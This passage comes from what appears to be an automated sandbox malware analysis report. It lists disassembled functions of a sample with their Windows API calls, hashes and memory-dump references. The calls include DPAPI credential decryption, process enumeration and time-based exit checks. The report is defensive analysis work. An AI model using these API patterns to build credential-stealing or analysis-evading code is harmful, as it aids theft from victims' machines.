                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: ac7013070527d07f1a03052b7e975f36bebe0ad2f870ee083b715d38c67e810b
                              • Instruction ID: 5bdbe27fa139fc7eade596a4142e311038a4262474cdd433a9a06e9b897b692f
                              • Opcode Fuzzy Hash: ac7013070527d07f1a03052b7e975f36bebe0ad2f870ee083b715d38c67e810b
                              • Instruction Fuzzy Hash: 5E4171B5904219DBDB10DF94DD89BFEB7B8BB48304F1041A9E509A7280D7745A84CFA6
                              Function 004C6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 004C696C
                              • sscanf.NTDLL ref: 004C6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004C69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004C69C0
                              • ExitProcess.KERNEL32 ref: 004C69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 4491fd477070aa472b0ac0de3f5c568ed544572a638c718c289284ef9651f5da
                              • Instruction ID: f173bcd1f37497ab62290e569c37f78a4dd8a01b7460d8282e127b78b10ab8ec
                              • Opcode Fuzzy Hash: 4491fd477070aa472b0ac0de3f5c568ed544572a638c718c289284ef9651f5da
                              • Instruction Fuzzy Hash: 7C21CBB5D14208ABCF44EFE4D945EEEB7B6BF48304F04852EE41AE3250EB745605CBA9
                              Function 004B7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 004B724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004B7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004B7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004B72A4
                              • LocalFree.KERNEL32(?), ref: 004B72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 08504c738c7814362082931d39f4f57d726911218f86e8b65b435504ee559365
                              • Instruction ID: 0394fa5220c87c59bdf05ac06ea89071a5ebef9a37060b535f683081868e2953
                              • Opcode Fuzzy Hash: 08504c738c7814362082931d39f4f57d726911218f86e8b65b435504ee559365
                              • Instruction Fuzzy Hash: 9B0112B5A40208BBDB14DFE4CD45FAE7779EB44704F104155FB19AB2C0D6B4AA01CB69
                              Function 004C9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004C961E
                              • Process32First.KERNEL32(004D0ACA,00000128), ref: 004C9632
                              • Process32Next.KERNEL32(004D0ACA,00000128), ref: 004C9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 004C965C
                              • CloseHandle.KERNEL32(004D0ACA), ref: 004C967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 2a2d44736582c773b186e958c735937891d003cf1936ee3fd96a94f92b0c3b9e
                              • Instruction ID: 83f0a26d5492985781e6103db29c2e60131fc866ae8ff611767ffda588584e50
                              • Opcode Fuzzy Hash: 2a2d44736582c773b186e958c735937891d003cf1936ee3fd96a94f92b0c3b9e
                              • Instruction Fuzzy Hash: 4B01E9B9A00208BBCB54DFA5CD48FEEB7F9AB48740F104189A90996280D774AE41CF55
                              Function 00884E44 Relevance: 6.7, Strings: 4, Instructions: 1678COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: q^Na$~$y$#8>$rt
                              • API String ID: 0-1945803552
                              • Opcode ID: d4e5b492466f3c5920dab80ecc61e9fa004a5934f9b77e620d9c815d82afe514
                              • Instruction ID: 777974bce8497046e89b27b845bcb6eea62edfe087af18c354b6a3ba05073fda
                              • Opcode Fuzzy Hash: d4e5b492466f3c5920dab80ecc61e9fa004a5934f9b77e620d9c815d82afe514
                              • Instruction Fuzzy Hash: 63B21BF360C2049FE304AE2DEC8567ABBE6EBD4720F16893DEAC4C7744E63558058696
                              Function 0087FC41 Relevance: 6.7, Strings: 4, Instructions: 1661COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: RYgx$ZNWm$cL~$ykY
                              • API String ID: 0-448492925
                              • Opcode ID: a8144c172d8d1f37acc14e3b05664908b94eb1ed85afec539c88fae608768854
                              • Instruction ID: d7cc10a453981cc5c80b90401c1d5bb7aa1985774b34545957b2e4e2a4e6b055
                              • Opcode Fuzzy Hash: a8144c172d8d1f37acc14e3b05664908b94eb1ed85afec539c88fae608768854
                              • Instruction Fuzzy Hash: 6FB227F3A0C2049FE304AE2DEC8567AFBE9EF94720F16493DEAC5C3744E63558058696
                              Function 004C8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,004B5184,40000001,00000000,00000000,?,004B5184), ref: 004C8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: f13eecf7153d075038a5d564c6c1d6a0295a5372d5f28ccdce042aacf914553f
                              • Instruction ID: a84b174c4f5850074c0d9f5a047d381f70f219abcc75d26ab774c334aee00112
                              • Opcode Fuzzy Hash: f13eecf7153d075038a5d564c6c1d6a0295a5372d5f28ccdce042aacf914553f
                              • Instruction Fuzzy Hash: DD110AB8200204AFDB40CFA4D884FB737AAAF89314F10955DF919CB250DB79E841DB69
                              Function 004C7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0118DB48,00000000,?,004D0E10,00000000,?,00000000,00000000), ref: 004C7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0118DB48,00000000,?,004D0E10,00000000,?,00000000,00000000,?), ref: 004C7A7D
                              • wsprintfA.USER32 ref: 004C7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 8971d0ec7026088042c85f55c1c06356afa889af16e3bc41774178f6a3e173e7
                              • Instruction ID: ec0020c9fc5b895235c33265ebef296a7bf5609c3bd57638e5fbfd2abfaf6366
                              • Opcode Fuzzy Hash: 8971d0ec7026088042c85f55c1c06356afa889af16e3bc41774178f6a3e173e7
                              • Instruction Fuzzy Hash: AA118EB1945218EBEB208B94DC49FAAB778FB04761F1043AAE91A932C0D7781E40CF55
                              Function 008884A6 Relevance: 5.4, Strings: 3, Instructions: 1659COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 6q$8**z$Rop
                              • API String ID: 0-1000716968
                              • Opcode ID: a2f9a2c3ec0b463d80b445b694290f10c42f0e0121c87881013ff17843c78946
                              • Instruction ID: 3b9f17dff494619f332e17f3ee656e73a6e3dab1ef49bcaee82a2f8648effeba
                              • Opcode Fuzzy Hash: a2f9a2c3ec0b463d80b445b694290f10c42f0e0121c87881013ff17843c78946
                              • Instruction Fuzzy Hash: 20B227F3A0C2049FE304AE2DEC85A7AFBE9EF94720F16453DE6C5C3744EA3558058696
                              Function 00886FC1 Relevance: 4.9, Strings: 3, Instructions: 1117COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 8O^7$jVw$y=u
                              • API String ID: 0-2459849181
                              • Opcode ID: 1fe14ca93d248b458979f9572dfb5a0a0ee678e8ee93cac76fe48b60c0b356c2
                              • Instruction ID: c6f5ef0e0499037a46e13870cac6fb0532623ec783ede9747090b3eb16e2e24e
                              • Opcode Fuzzy Hash: 1fe14ca93d248b458979f9572dfb5a0a0ee678e8ee93cac76fe48b60c0b356c2
                              • Instruction Fuzzy Hash: 6F7215F360C2009FE308AE29EC8567AF7E9EF94720F16893DE6C4C7744EA3558458796
                              Function 004C3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(004CE118,00000000,00000001,004CE108,00000000), ref: 004C3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004C37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 843b9fc49db7ac53c06b4abc7cadf448e78e0aad3c9bbaab9b7fe60f7c0fa1c5
                              • Instruction ID: 42739a16ad2e16bafd80b4271123d4ef605093d065affdbf4942f3954f1eb486
                              • Opcode Fuzzy Hash: 843b9fc49db7ac53c06b4abc7cadf448e78e0aad3c9bbaab9b7fe60f7c0fa1c5
                              • Instruction Fuzzy Hash: 97410774A00A289FDB24DF58CC94F9BB7B5BB48306F4091D9E608A7290D7756E85CF50
                              Function 004B9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004B9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 004B9BA3
                              • LocalFree.KERNEL32(?), ref: 004B9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 3083bf430d54a06be068bb65e4da8c2b756c96971c9404b8cfb862bf66d6f878
                              • Instruction ID: c06a6125b5718221989284e4a3bf71138ef0e785f151d11fc7585ca260926076
                              • Opcode Fuzzy Hash: 3083bf430d54a06be068bb65e4da8c2b756c96971c9404b8cfb862bf66d6f878
                              • Instruction Fuzzy Hash: 6311B7B8A00209EFCB04DF94D985AAE77F9FF88300F104599E915AB350D774AE10CFA1
                              Function 00889FB2 Relevance: 4.1, Strings: 2, Instructions: 1604COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
